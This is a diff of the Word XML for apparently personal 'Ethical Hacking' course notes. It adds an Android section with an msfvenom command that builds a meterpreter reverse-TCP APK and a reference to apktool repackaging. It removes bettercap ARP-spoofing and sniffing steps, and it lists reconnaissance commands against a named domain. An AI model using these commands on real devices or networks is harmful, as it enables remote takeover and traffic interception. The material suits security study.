+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">&gt;help </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>arp.spoof</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">&gt;set </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>arp.spoof</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>.fullduplex</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> true</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">&gt;set </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>arp.spoof</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>.targets</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:r>
-              <w:t>help</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">&gt;set </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>net.sniff</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>.local</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> true</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>arp.spoof</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> on</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>net.sniff</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> on</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Note: If you want to run previous – You need to create a </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sniff.cap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>bettercap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>iface</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> eth0 -caplet </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sniff.cap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>Alternative: ETTERCAP</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;cat /proc/sys/net/ipv4/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ip_forward</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Note: If </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>its</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> enable packet forwarding 0 or 1</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>&gt;echo 1 &gt; /proc/sys/net/ipv4/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ip_forward</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>Note: To start</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>It</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> will pop a window</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;Ettercap -G</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Can code </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>using</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>scapy</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> instead of python</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
+              <w:t>Android Hacking</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Download in VM </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId5" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://www.osboxes.org/android-x86/</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>&gt;msfvenom -p android/meterpreter/reverse_tcp LHOST={YOURIPADDRESS} LPORT=5555 -o shell.apk</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;sudo service apache2 start</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Using Evil Twin Android</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Search in google- evil droid(Github)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>More like Social Engineering</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>apktool</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -228,9 +228,19 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo ifconfig</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ifconfig</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -264,8 +274,13 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>pwd – current directory</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>pwd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – current directory</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -300,12 +315,14 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>M</w:t>
             </w:r>
             <w:r>
               <w:t>kdir</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – add folder</w:t>
             </w:r>
@@ -403,8 +420,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Virtual Machine msfadmin</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Virtual Machine </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfadmin</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -513,8 +535,21 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo su – ROOT USER</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>su</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – ROOT USER</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -708,11 +743,19 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Nglookup erertech.com</w:t>
+              <w:t>Nglookup</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> erertech.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -723,6 +766,7 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -735,6 +779,7 @@
               </w:rPr>
               <w:t>hois</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -765,8 +810,13 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:r>
-              <w:t>Whatweb erertech.com -v</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> erertech.com -v</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -801,6 +851,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -813,6 +864,7 @@
               </w:rPr>
               <w:t>hatweb</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -832,6 +884,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -842,12 +895,19 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">hatweb </w:t>
-            </w:r>
+              <w:t>hatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>erertech.com</w:t>
             </w:r>
             <w:r>
@@ -863,16 +923,24 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>whatweb 192</w:t>
-            </w:r>
+              <w:t>whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve"> 192</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>.168.1.4-192.168.1.255</w:t>
             </w:r>
             <w:r>
@@ -975,12 +1043,14 @@
               </w:rPr>
               <w:t>-</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>theHarvester</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1010,12 +1080,26 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">-theHarvester -d erertech.com </w:t>
-            </w:r>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t>theHarvester</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -d erertech.com </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>-b all</w:t>
             </w:r>
           </w:p>
@@ -1108,13 +1192,23 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo apt update</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Sudo apt install python-pip</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt install python-pip</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1373,13 +1467,31 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo netdiscover</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>netdiscover</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1462,7 +1574,91 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>&gt;nmap -sC -sV -oN {folderName} {TargetIPAddress}</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>sC</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>oN</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>folderName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>} {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>TargetIPAddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
